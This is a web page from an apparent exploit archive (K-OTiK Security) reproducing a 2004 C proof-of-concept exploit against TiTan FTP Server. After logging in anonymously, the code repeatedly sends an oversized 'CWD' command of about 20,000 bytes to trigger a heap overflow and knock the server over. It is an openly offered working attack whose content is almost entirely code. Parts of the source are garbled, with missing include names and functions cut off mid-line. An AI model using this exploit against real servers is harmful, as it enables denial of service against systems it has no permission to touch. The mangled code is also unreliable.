TiTan FTP Server Long Command Heap Overflow PoC Exploit

 

                        

                          

                            
                          

                        

                      


                      
/*
*-----------------------------------------------------------------------
* 
* titanftp.c - TiTan FTP Server Long Command Heap Overflow PoC Exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author   : lion
*             :  net
*             : www cnhonker com
* Date     : 2004-08-30
*
*-----------------------------------------------------------------------
*/
#include 
#include 
#include  

#pragma comment(lib, "ws2_32.lib")

#define FTPPORT      21
#define BUFFSIZE     204800
#define OVERFLOWSIZE 20480
#define SIZE         2048      

// function
int create_socket();
int client_connect(int sockfd,char* server,int port);
int writebuf(char *s,int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
void checkstatus(char *s);
void loginftp(SOCKET sockfd, char *user, char *pass);

int show = 1;
char recvbuf[BUFFSIZE];
char sendbuf[BUFFSIZE];

void main(int argc, char *argv[])
{
    WSADATA wsa;
    unsigned short    port;
    unsigned long     ip;
    char user[32] = "anonymous";
    char pass[32] = "anonymous";
    
    char *command = "CWD ";

    SOCKET s;
    int size = OVERFLOWSIZE;

    printf("TiTan FTP Server Long Command Heap Overflow PoC Exploit\r\n");
    printf("lion lion#cnhonker.net, http://www.cnhonker.com\r\n\n");

    if(argc  \r\n", argv[0]);
        return;
    }
    
    WSAStartup(MAKEWORD(2,2),&wsa);

    while(1)
    {
        if((s=create_socket())==0) 
        {
            printf("[-] ERROR: Create socket failed.\r\n");
            return;
        }
      
        if(!client_connect(s, argv[1], atoi(argv[2])))
            exit(-1);
    
        loginftp(s, user, pass);
    
        memset(sendbuf, 0 ,BUFFSIZE);
        memcpy(sendbuf, "pasv\r\n", 6);
        writebuf("Send pasv", s, sendbuf, 6);
        readbuf("read", s, recvbuf, BUFFSIZE);
    
        memset(sendbuf, 0, BUFFSIZE);
        memset(sendbuf, 'A', size);
        memcpy(sendbuf, command, strlen(command));
        sendbuf[size-2] ='\r';
        sendbuf[size-1] ='\n';
    
        printf("buff size :%d\r\n%s\r\n", strlen(sendbuf), sendbuf);
        show=1;
        writebuf("Send overflow buff", s, sendbuf, size);
        readbuf("read", s, recvbuf, BUFFSIZE);
        
        //send QUIT
        memset(sendbuf,0, BUFFSIZE);
        sprintf(sendbuf, "%s\r\n", "QUIT");
        writebuf("Send QUIT", s, sendbuf, strlen(sendbuf));
    
        //show=1;
        //readbuf("[+] QUIT......", s, recvbuf, BUFFSIZE);    
        //return;
        
        if(s)
            closesocket(s);
            
        Sleep(2000);
    }
    
    WSACleanup();
}

int create_socket()
{  
    int sockfd;
  
    sockfd=socket(AF_INET,SOCK_STREAM,0);
    if(sockfdh_addr);
    printf("[+] Trying %s:%d......", server, port);
    fflush(stdout);

    if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))

                    		
                  

                

              

            

            

              
                

                  
                    
 F-VNS Security Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

                  		
                

              
            

          		
        

      
    

  

  

    

      
        

          
Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

        

      		
    

  

  

    

      
        
actualité informatique  Exploits